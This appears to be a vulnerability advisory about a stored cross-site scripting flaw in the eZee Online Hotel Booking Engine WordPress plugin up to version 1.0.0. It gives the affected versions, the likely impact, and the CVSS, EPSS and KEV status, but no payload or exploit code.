The eZee Online Hotel Booking Engine plugin for WordPress contains a stored cross‑site scripting flaw where user input is not properly neutralized before being output in web pages. This is an instance of CWE‑79: Improper Neutralization of Input During Web Page Generation. If an attacker stores malicious JavaScript payload in a field that the plugin saves to the database, the payload will later be rendered to visitors of the site, potentially allowing the attacker to steal session cookies, deface the site, or perform other malicious actions. The impact is a compromise of confidentiality and integrity for anyone who accesses affected pages, but it does not grant the attacker direct system or server access.

The vulnerability exists in all releases of the eZee Online Hotel Booking Engine plugin up to version 1.0.0. WordPress sites that have this plugin installed are impacted. The issue affects both front‑end booking forms and any administrative interfaces where user data is stored.

The CVSS score of 5.9 denotes medium severity. The EPSS score of less than 1 % indicates a very low probability of current exploitation. The plugin is not listed in the CISA KEV catalog, suggesting no widespread exploitation has been observed. Based on the description, it is inferred that the attacker must be able to submit data to the plugin, such as through booking forms or administrative entries, to store the payload. The attack vector is a web application, local to the application, and affects any visitor who loads a page containing the stored script.